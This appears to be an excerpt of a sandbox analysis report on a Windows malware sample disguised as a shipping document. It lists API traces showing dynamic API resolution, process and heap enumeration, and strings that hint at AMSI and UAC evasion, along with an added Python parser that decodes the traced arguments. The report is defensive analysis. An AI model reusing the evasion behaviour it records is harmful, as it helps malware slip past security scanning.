                                                                                                    • Instruction Fuzzy Hash: 97F0F9F0B513004FEB05DF7999443057AE6EB89389F1485B9E709DB399E771D4198B10
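The API lines in these function entries, such as the VirtualAlloc call above and the RegOpenKeyExA and GetFileAttributesA calls in the entries that follow, give every argument as raw 32-bit hex (or "?" where the sandbox could not recover it), so the allocation size, allocation type and page protection have to be decoded by hand. The following is an added Python example, not part of the Joe Sandbox report, that parses lines in the layout shown on this page into typed records, decodes the VirtualAlloc flags against the Win32 constants, resolves registry hive handles, and collects the literal string arguments (the registry path, the export-style names on the GetFileAttributesA stack). The sample input is constructed by copying four API lines from the entries on this page; the line layout, the comma-separated argument split (no string argument may contain a comma) and the "8 hex digits means a number" rule are assumptions about the report format, not something the report states.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: four API lines copied from the function entries on
# this page (report indentation trimmed). Raw string so the registry path keeps
# its single backslashes.
SAMPLE = r"""
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2
• GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25832
  • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
• GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F
"""

# Layout of one API line as it appears in the report (assumption: this layout
# holds for every entry; '?' marks an argument the sandbox could not recover).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants (winnt.h / winreg.h values).
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: list                          # int for 8-hex-digit values, str for literals, None for '?'
    ref: str                            # address of the call site
    subcall_of: Optional[str] = None    # function the call was lifted from, if any


def _typed(raw: str):
    """'?' -> None; exactly 8 hex digits -> int; anything else -> literal string.
    Caveat: a real string made of 8 hex characters would be misread as a number."""
    raw = raw.strip()
    if raw == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return int(raw, 16)
    return raw


def parse_api_lines(text: str) -> list[ApiCall]:
    """Turn the report's API lines into records; headings and blank lines are skipped.
    Arguments are split on ',', so a string argument containing a comma would break."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [_typed(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["func"], m["mod"], args, m["ref"].upper(), m["sub"]))
    return calls


def string_args(call: ApiCall) -> list[str]:
    """Literal (non-numeric) arguments, e.g. registry paths or names left on the stack."""
    return [a for a in call.args if isinstance(a, str)]


def decode_virtual_alloc(call: ApiCall) -> dict:
    """Decode VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)."""
    if call.func != "VirtualAlloc" or len(call.args) < 4:
        raise ValueError("not a VirtualAlloc call")
    _addr, size, alloc_type, protect = call.args[:4]
    if None in (size, alloc_type, protect):
        raise ValueError("argument not recovered by the sandbox")
    names = [n for bit, n in MEM_FLAGS.items() if alloc_type & bit]
    prot = [PAGE_PROTECT.get(protect & 0xFF, f"0x{protect & 0xFF:X}")]
    if protect & 0x100:
        prot.append("PAGE_GUARD")
    return {"size": size, "alloc_type": names, "protect": prot,
            "executable": bool(protect & 0xF0)}   # any PAGE_EXECUTE_* value


def summarize(text: str) -> list[str]:
    """One readable line per call: call site, API, and the decoded interesting arguments."""
    out = []
    for c in parse_api_lines(text):
        where = f"{c.ref} {c.func}.{c.module}"
        if c.subcall_of:
            where += f" (via sub_{c.subcall_of})"
        if c.func == "VirtualAlloc":
            d = decode_virtual_alloc(c)
            out.append(f"{where}: size=0x{d['size']:X} {'|'.join(d['alloc_type'])} "
                       f"{'|'.join(d['protect'])}" + (" EXECUTABLE" if d["executable"] else ""))
        elif c.func.startswith("RegOpenKeyEx") and isinstance(c.args[0], int):
            hive = HIVES.get(c.args[0], f"0x{c.args[0]:08X}")
            out.append(f"{where}: {hive}\\{c.args[1]}")
        else:
            s = string_args(c)
            out.append(f"{where}: strings={s}" if s else where)
    return out


if __name__ == "__main__":
    for line in summarize(SAMPLE):
        print(line)
```

Run against the sample, the VirtualAlloc line at 02B215E2 decodes to a 0x140000-byte MEM_COMMIT region requested as PAGE_READWRITE, i.e. not executable at allocation time; whether a loader later changes that protection is the next thing to look for in the remaining API entries. The 00000105 argument to GetModuleFileNameA is MAX_PATH + 1, the buffer size the Delphi runtime passes when it resolves its own module path before the Software\Borland\Locales lookup.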
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 1927566239-0
                                                                                                    • Opcode ID: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
                                                                                                    • Instruction ID: 37fb33052693bec0e8c91ee4d4b4f99e2090fef439e3d9e32e61c4891298f951
                                                                                                    • Opcode Fuzzy Hash: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
                                                                                                    • Instruction Fuzzy Hash: CE316F71600328ABDB11DEAAC984AAE77B8EB0C301F4845E1F91DD7250D334F958CB61
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19
                                                                                                      • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgString
                                                                                                    • String ID:
                                                                                                    • API String ID: 4225568880-0
                                                                                                    • Opcode ID: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
                                                                                                    • Instruction ID: 6ca04686244a69351007b29f1fdcdee3a242afc09b583c784f1a87b73c4fa994
                                                                                                    • Opcode Fuzzy Hash: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
                                                                                                    • Instruction Fuzzy Hash: 8BE0E530200354BFE312EBA5CC0195A77BDDB49B40B5108F1B804D7510DA305D088864
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25832
                                                                                                      • Part of subcall function 02B25A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                                                      • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                                                      • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                                                      • Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                                                      • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                                                      • Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                                                      • Part of subcall function 02B25A78: RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 2796650324-0
                                                                                                    • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                    • Instruction ID: ec2e068fef510ae88d5aa20802f0e3d832a6390947f2cf17fbe46fbc01d70543
                                                                                                    • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                    • Instruction Fuzzy Hash: 20E06D71A003248BCB24DE5C88C0A5637D8AB08750F4005A5EC58DF34AD3B0E9588BD0
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B27DA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                    • Instruction ID: 5be0ff0480d8eec0c22653ce75bdf1a026931da633dce5af00bb0e8753da3c6e
                                                                                                    • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                    • Instruction Fuzzy Hash: 32D05BB23082507AD220955A5C44EFB6BDCCFC9770F100679B65CC3180D7208C0587B1
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: AttributesFile
• String ID:
APIs
• GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B
Similarity
• API ID: AttributesFile
• String ID:
APIs
Similarity
• API ID: FreeString
• String ID:
APIs
• timeSetEvent.WINMM(00002710,00000000,02B4BB3C,00000000,00000001), ref: 02B4BB58
Similarity
• API ID: Eventtime
• String ID:
APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B24BEB
Similarity
• API ID: AllocString
• String ID:
APIs
• SysFreeString.OLEAUT32(00000000), ref: 02B24C03
Similarity
• API ID: FreeString
• String ID:
APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B22000), ref: 02B216A4
Similarity
• API ID: AllocVirtual
• String ID:
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B21FE4), ref: 02B21704
Similarity
• API ID: FreeVirtual
• String ID:
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B3ABDB,?,?,02B3AC6D,00000000,02B3AD49), ref: 02B3A968
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B3A980
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B3A992
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B3A9A4
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B3A9B6
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B3A9C8
• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B3A9DA
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B3A9EC
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B3A9FE
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B3AA10
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B3AA22
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B3AA34
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B3AA46
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B3AA58
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B3AA6A
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B3AA7C
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B3AA8E
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B258D1
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B258E8
• lstrcpynA.KERNEL32(?,?,?), ref: 02B25918
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B2597C
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259B2
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259C5
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259D7
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000,02B4D790), ref: 02B259E3
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330,02B20000), ref: 02B25A17
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B27330), ref: 02B25A23
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B25A45
Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                    • Opcode ID: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                                                    • Instruction ID: ef19b5861f0a776c3709b57b8a60613d9e1f53b3104abb0afcf131cdb76060ab
                                                                                                    • Opcode Fuzzy Hash: 872f257b6b04869d87247dd964f354147b7dffd4ccc2b38a04f8a74b8bb427a6
                                                                                                    • Instruction Fuzzy Hash: 80415C71D00369AFDB20DAE8CC88ADEB3ADEB09310F4445E5A55DE7242D770DB488F50
                                                                                                    APIs
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                    • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                    • Instruction ID: 4e7c4795c87d4e92b067478b9e8efea4f613c2413f3a0341889c71a407bfe146
                                                                                                    • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                    • Instruction Fuzzy Hash: 723147B1E5033C6AEB35DAB89C45BEF77AD9B04380F4441E1A64CE6182E6749E8C8F50
                                                                                                    APIs
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B27F75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpace
                                                                                                    • String ID:
                                                                                                    • API String ID: 1705453755-0
                                                                                                    • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                    • Instruction ID: 86d81e3383bfd5107e75066fa776f5b6d644b7628be5b0c381dc24be524bb113
                                                                                                    • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                    • Instruction Fuzzy Hash: E71100B5A00209AF9B04CF99C9809EFF7F9EFC8314B14C569A509EB254E6319A018B90
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                    • Instruction ID: 35a3ec67dbf0fe8769cda405791b51436c037b8161daa7ddb537672a3e602f75
                                                                                                    • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                    • Instruction Fuzzy Hash: 9FE0D83570032417D311A5685C809F6B36D9B5C310F0041FEBD4DC7391EDA09D484EE8
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32(?,02B4C106,00000000,02B4C11E), ref: 02B2B71A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
                                                                                                    • Instruction ID: ecf8714acdbaaf4c9e509bd56a863722ef7d7c6f0ace28d3950ad161f215306c
                                                                                                    • Opcode Fuzzy Hash: 4189a973054fdabbd04d8bf6fde7435a292a0ad65bee57349382d14a855aa87f
                                                                                                    • Instruction Fuzzy Hash: 92F0DA78A443129FD350DF28D580F1577E5FB49B54F8089A9E89CC7390EB389418CF52
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B2BDF2,00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2A7A3
